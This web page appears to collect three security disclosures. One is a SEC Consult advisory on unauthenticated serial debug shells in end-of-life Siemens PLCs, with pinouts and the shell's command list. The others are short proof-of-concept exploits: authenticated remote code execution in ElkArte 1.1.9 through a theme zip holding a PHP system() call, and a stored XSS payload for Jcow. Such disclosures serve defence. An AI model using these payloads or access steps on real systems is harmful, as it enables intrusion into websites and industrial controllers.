<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240524-0 ><br />=======================================================================<br /> title: Exposed Serial Shell on multiple PLCs<br /> product: Siemens CP-XXXX Series (CP-2014, CP-2016, CP-2017, CP-2019, CP-5014)<br /> vulnerable version: All hardware revisions<br /> fixed version: Hardware is EOL, no fix<br /> CVE number: -<br /> impact: Low<br /> homepage: https://www.siemens.com<br /> found: ~2023-06-01<br /> by: Steffen Robertz (Office Vienna)<br /> Gerhard Hechenberger (Office Vienna)<br /> Constantin Schieber-Knöbl (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"We are a technology company focused on industry, infrastructure,<br />transport, and healthcare. From more resource-efficient factories,<br />resilient supply chains, and smarter buildings and grids, to cleaner<br />and more comfortable transportation as well as advanced healthcare,<br />we create technology with purpose adding real value for customers."<br /><br />Source: https://new.siemens.com/global/en/company/about.html<br /><br /><br />Business recommendation:<br />------------------------<br />The hardware is no longer produced nor offered to the market. 
Hence<br />HW adaptions resulting in modified products are not possible anymore.<br />The described HW behavior on this generation of devices cannot be<br />corrected by means of FW patches.<br /><br />The risk of successful exploitation is considered low as physical access to<br />those devices is needed.<br /><br />SEC Consult highly recommends to perform a thorough security review of the product<br />conducted by security professionals to identify and resolve potential further<br />security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Exposed Serial Shell on multiple Siemens PLCs<br />A serial interface can be accessed with physical access to the PCB. After<br />connecting to the interface, access to a shell with various debug functions<br />as well as a login prompt is possible.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Exposed Serial Shell on multiple Siemens PLCs<br /><br />* CP-2016 (Figure 1)<br />The serial interface on the CP-2016 can be accessed by connecting to the<br />following through hole pins of an unpopulated header:<br /><br /> +-+<br /> |o|<br /> |o|RX<br /> |o|TX<br /> |o|<br /> |o|<br /> |o|GND<br /> +-+<br /><br />* CP-2019 (Figure 2)<br />The serial interface on the CP-2019 can be accessed by connecting to the<br />following through hole pins of an unpopulated header:<br /><br /> +-+<br /> |o|<br /> |o|RX<br /> |o|TX<br /> |o|<br /> |o|<br /> |o|GND<br /> +-+<br /><br /> * CP-2014 (Figure 3)<br />The serial interface on the CP-2014 can be accessed by connecting to the<br />following through hole pins of an unpopulated header:<br /><br /> +-+<br /> |o|GND<br /> |o|<br /> |o|<br /> |o|RX<br /> |o|TX<br /> |o|<br /> +-+<br /><br /> * CP-2017 (Figure 4)<br />The serial interface on the CP-2017 can be accessed on the compute module<br />by connecting to pins 9 and 10 on the populated SMD connector:<br /><br /> 1 TX RX<br /> '-'-'-'-'-'-'-'-'-'<br /> 
/-------------------\<br /> | |<br /> |-------------------|<br /> +'-'-'-'-'-'-'-'-'-'+<br /> 11 20<br /><br /><br />* CP-5014 (Figure 5)<br />The serial interface on the CP-5014 can be accessed on the compute module<br />by connecting to pins 1 and 2 on the populated SMD connector:<br /><br /> RX TX 10<br /> '-'-'-'-'-'-'-'-'-'<br /> /-------------------\<br /> | |<br /> |-------------------|<br /> +'-'-'-'-'-'-'-'-'-'+<br /> 11 20<br /><br /><br />All serial connections allow access to the SH1703 shell in version 1.00.<br />The shell requires no authentication and allows the usage of multiple<br />commands.<br /><br />The following output can be seen on all devices:<br /><br />---------------------------------------------------<br /> XXXXX XXX XXX X XXXXX XXX XXX<br /> X X X X XXX X X X X X X<br /> X X X X X X X X<br /> XXXXX XXXXX X X X X XX<br /> X X X X X X X X<br /> X X X X X X X X X X<br /> XXXXX XXX XXX XXXXX X XXX XXX<br />---------------------------------------------------<br /><br />1703 Shell [V1.00]<br />(c) by 1703 Development Team<br /><br />type 'help' or '?' or press 'F1' for help<br /><br />SH1703><br /><br />Initialize system ..<br />. Init Done.<br /><br />system startup after Power-Up ...<br />Install device 'USB Server'.<br /><br /> RTC time not valid<br /><br /> RTC time not valid<br /><br /> RTC time not valid<br />Reg: 100 Komp: 2 BSE: 20<br />Hello from <R#100 / K#2 / BSE#2> FW-ID: 2019 FW-Version: 0.06A01<br />Startup ZBGs ... done.<br /><br />system ready<br />SH1703>help<br />Available commands:<br /> hist Display command history<br />!<n> Execute <n> command from stack<br /> ? 
[<cmd>] Display this message<br /> help [<cmd>] Display this message<br /> echo <text> Displays text<br /> call <file> Run script file<br /> cls Clear screen<br /> loop <cmd> Loop-execution of cmd<br /> ldfile <file> Load ascii file<br /> db <a> [-b|w|d<x> [-n<x>]] Display memory byte/word/dword<br /> wb <a> <val> [-b|w|d<x>] Write memory byte/word/dword<br /> mb <a> [-b|w|d<x> [-n<x>]] Monitoring memory byte/word/dword<br /> login Login<br /> logoff Logoff<br /> pci ... PCI Commands<br /> bemrk Run Benchmark<br /> drv List installed drives<br /> dir List files in directory<br /> del [<drv:>]<file> Delete file<br /> ren <src> <dest> Rename or move file<br /> cd <dir>|<..> Change current directory or drive<br /> md <dir> Make directory<br /> rd <dir> Remove directory<br /> type [<drv:>]<file> Displays the contents of a file<br /> copy <src> <dest> Copy a file<br /> findstr <file> <str> Find a string in a textfile<br /> mkdisk <drvname> <size> Make a Ramdisk<br /> uidisk <drvname> Close and uninstall a disk<br /> format <drvname> Format drive<br /> mem_wr <addr> <size> <des> Write mem to file<br /> idr Read from diagnostic ring<br /> icr Clear diagnostic ring<br /> idd Debug-Trace ON<br /> bp Read all breakpoint settings<br /> bpf [<file>] Set File for Debugprint (no arg = stdout)<br /> is ... Debugger settings<br /> ig [f|s] Display BPs / Clear all BPs<br /> idb Read DB-Breaks<br /> idt Read DB-Trace Settings<br /> icz Clear breakpoint counters<br /> dev ... ZIO-Device commands<br /> bsp ... bsp commands<br /> ftrc ... 
FTRC Commands<br /> banner Display the banner<br /> pl Display process list<br /> pi [<appl_nr>] Display process info<br /> ad -c|d|k|s APP-Debug Create|Detach|Kill|Start<br /> tl Display task list (all processes)<br /> tm [-r] Display task monitor (-r = runtime)<br /> tc <taskname> Display task context<br /> td <taskID> Display task descriptor<br /> tq Display task queues<br /> sysztsk Display ZOS-tasks of system process<br /> appztsk [<appl_nr>] Display ZOS-tasks of appl-process(es)<br /> stack Display stack usage of all tasks<br /> stsk -c|d|e|s|r ZOS-Task Create|Del|Exch|Suspend|Resume<br /> tsktrc -s|r|c ZOS-Task-Trace Start|Read|Clear<br /> set [<name>=<val>] Display, set or remove environment variables<br /> time Display the current time<br /> timeset Set the current time<br /> mem Display memory usage<br /> status Display system status informations<br /> ver Display version informations<br /> r Reset system element (R,R Cxx,R Pxx,R Zxx<br /> klog [dis|ena|all] Display, disable or enable kernel logging<br /> psp_info Display prozessor configuration infos<br /> int_info Interrupt-Info-List<br /> int_gen Generate Interrupt (for Admin only)<br /> tlbs Display TLBs<br /> ga [<appl_nr>] Start Subshell of application<br /> tsd Debug Timeserver<br /> mci MCI Commands<br /> usb <cmd> USB commands<br /> mmc <cmd> MMC Commands<br /> zhs ZHS commands<br /> zpv Parameter infos<br /> zdt data transporter<br /> fsn ZIO/FSN statistics<br /> net <enet|emac|mal> <dev> Network statistics<br /> prd <pg> <reg> <len> Read PHY register (len: 8|16|32)<br /> pwr <pg> <reg> <len> <data> Write PHY register (len: 8|16|32)<br /> rmib Reset all statistic counters<br /> scfg Display broadcom switch registers<br /> ipaddr <dev> Display ip addresses on interface<br /> route Display routing table<br /> socket Display socket statistic<br /> tcp Display tcp statistic<br /> udp Display udp statistic<br /> arp Display arp cache<br /> ping host-ipaddr send ICMP ECHO_REQUEST to a host<br /> arl 
Switch Address Resolution table<br /> ebuf Statistic for Buffer handling FSN<br /> tls_ciph print cipher suites for all connections<br /> tls_obj idx print connection objects<br /> tls_log log level for tls lib<br /> tls_deb idx print connection debug cnts<br /> tlscache print cert/key cache<br /> opensslm print mem pool statistic for openssl<br /> tlsdeb_s START mem pool debug function<br /> tlsdeb_e END mem pool debug function<br /> tlsdeb_r print mem pool debug for openssl<br /> tlsdeb_c CLEAR mem pool debug function<br /> sap special application function<br />Available Function-Keys:<br /> F1 Help<br /> F2 Display system status informations<br /> F3 Display Last command<br /> F5 Display the current time<br /> F7 History<br /> F8 Display memory usage<br /> F9 Display ZOS-Task Infos<br /> F10 Display Tasklist<br /> F11 Execute Last command<br />SH1703><br /><br />----------------------------------------<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following versions have been tested which were the latest version available<br />at the time of the test:<br />* CP-2016: CPCX26 V0.06A01<br />* CP-2019: PCCX26 V0.06A01<br />* CP-2014: CPCX25 V0.05A04<br />* CP-2017: PCCX25 V0.11A10<br />* CP-5056: CPCX55 V0.10A04<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2024-03-05: Contacting vendor through productcert@siemens.com<br />2024-03-06: Siemens tracks this issue as case #04393<br />2024-04-03: Requested status update.<br />2024-04-03: Product is EOL, no fix planned.<br />2024-04-29: Informed Siemens about planned publication of advisory.<br />2024-04-30: Siemens, requests draft of advisory. Advisory is sent for review.<br />2024-05-07: Siemens requested small changes in the Solution and Business<br /> Recommendation.<br />2024-05-24: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />The hardware is no longer produced nor offered to the market. 
Hence HW<br />adaptations resulting in modified products are not possible anymore. The<br />described HW behavior on this generation of devices cannot be corrected<br />by means of FW patches.<br /><br />The risk of successful exploitation is considered low as physical access to<br />those devices is needed.<br /><br /><br />Workaround:<br />-----------<br />Make sure to strictly limit physical access to the PLC during and also<br />after its life cycle.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. 
The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendations about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested in working with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Steffen Robertz, Gerhard Hechenberger, Constantin Schieber-Knöbl / @2024<br /><br /></code></pre>
<pre><code># Exploit Title : ElkArte Forum 1.1.9 - Remote Code Execution (RCE) (Authenticated) <br /># Date: 2024-5-24<br /># Exploit Author: tmrswrr<br /># Category: Webapps<br /># Vendor Homepage: https://www.elkarte.net/<br /># Software Link : https://github.com/elkarte/Elkarte/releases/download/v1.1.9/ElkArte_v1-1-9_install.zip<br /># Version : 1.1.9<br /><br /><br />1) After login go to Manage and Install theme > https://127.0.0.1/ElkArte/index.php?action=admin;area=theme;sa=admin;c2e3e39a0d=276c2e3e39a0d65W2qg1voAFfX1yNc5m<br />2) Upload test.zip file and click install > test.zip > test.php > <?php echo system('id'); ?><br />3) Go to Theme Setting > Theme Directory > https://127.0.0.1/ElkArte/themes/test/test.php<br />Result : uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte) uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte)<br /></code></pre>
<pre><code># Exploit Title: Jcow Social Networking 14.2 < 16.2.1 | Stored XSS <br /># Date: 2024-05-23<br /># Author: tmrswrr<br /># Vendor Homepage: https://www.jcow.net/<br /># Software Link: https://sourceforge.net/projects/jcow/<br /># Tested : https://demo.jcow.net/<br /># Version : 14.2 < 16.2.1<br /><br /><br />1) Log in as any user and open the invite page: https://127.0.0.1/Jcow/index.php?p=invite<br />2) Enter the payload in the To (Email address) field: "><img src=x onerrora=confirm() onerror=confirm(1)><br />3) After clicking Send invitations, the alert is displayed<br /><br /><br /></code></pre>